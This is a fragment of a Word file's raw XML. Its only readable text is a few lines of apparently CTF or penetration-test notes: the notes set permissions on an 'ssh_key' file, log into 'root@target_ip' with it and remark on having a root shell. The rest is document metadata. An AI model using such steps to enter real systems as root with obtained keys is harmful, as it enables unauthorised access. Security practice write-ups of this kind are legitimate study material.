    <w:p w14:paraId="364DE63A" w14:textId="3D9E6493" w:rsidR="005469CB" w:rsidRDefault="005469CB">
      <w:r>
        <w:t>Chmod 0400 ssh_key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E366148" w14:textId="77777777" w:rsidR="005469CB" w:rsidRDefault="005469CB"/>
    <w:p w14:paraId="3CA99243" w14:textId="3664C534" w:rsidR="00800E8A" w:rsidRDefault="00800E8A">
      <w:r>
        <w:t>#to access the system via ssh.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C4E58BE" w14:textId="3620D8F6" w:rsidR="005469CB" w:rsidRDefault="005469CB">
      <w:r>
        <w:t>Ssh -i ssh_key root@target_ip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42792DFB" w14:textId="482CAAC6" w:rsidR="005469CB" w:rsidRDefault="005469CB">
      <w:r>
        <w:t>#-i for ssh_key file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F3B43B3" w14:textId="01954DE4" w:rsidR="005469CB" w:rsidRDefault="005469CB">
      <w:r>
        <w:t># we logged in as root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C9E2C11" w14:textId="34B4A400" w:rsidR="005469CB" w:rsidRDefault="00C23A04">
      <w:r>
        <w:t># command shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72557E82" w14:textId="77777777" w:rsidR="00C23A04" w:rsidRDefault="00C23A04"/>
    <w:p w14:paraId="2A1EAFA4" w14:textId="77777777" w:rsidR="00C23A04" w:rsidRDefault="00C23A04"/>
    <w:p w14:paraId="7EF8BA9B" w14:textId="77777777" w:rsidR="00D32EBC" w:rsidRPr="00D32EBC" w:rsidRDefault="00D32EBC"/>
    <w:p w14:paraId="29C2196D" w14:textId="77777777" w:rsidR="00396AB2" w:rsidRDefault="00396AB2"/>
    <w:p w14:paraId="04B7C372" w14:textId="77777777" w:rsidR="00396AB2" w:rsidRDefault="00396AB2"/>
    <w:sectPr w:rsidR="0039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03"/>
    <w:rsid w:val="000F36F7"/>
    <w:rsid w:val="00132503"/>
    <w:rsid w:val="002C7765"/>
    <w:rsid w:val="00396AB2"/>
    <w:rsid w:val="005469CB"/>
    <w:rsid w:val="00551663"/>
    <w:rsid w:val="00595B1E"/>
    <w:rsid w:val="005B71A8"/>
    <w:rsid w:val="006A2693"/>
    <w:rsid w:val="00755B95"/>
    <w:rsid w:val="007A4D03"/>
    <w:rsid w:val="00800E8A"/>
    <w:rsid w:val="008216C8"/>
    <w:rsid w:val="00853ABF"/>
    <w:rsid w:val="008D578E"/>
    <w:rsid w:val="009F642A"/>
    <w:rsid w:val="00BD7D95"/>
    <w:rsid w:val="00C04834"/>
    <w:rsid w:val="00C23A04"/>
    <w:rsid w:val="00C82367"/>
    <w:rsid w:val="00CE7FB3"/>
    <w:rsid w:val="00D16049"/>
    <w:rsid w:val="00D32EBC"/>
    <w:rsid w:val="00EC076A"/>
    <w:rsid w:val="00ED5F00"/>
    <w:rsid w:val="00FC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B68C"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{B953BADA-F3AA-4454-88AD-1DDB2803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301</Words>
  <Characters>2338</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>155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31</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-10-22T03:38:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-10-22T04:57:00Z</dcterms:modified>
</cp:coreProperties>
</file>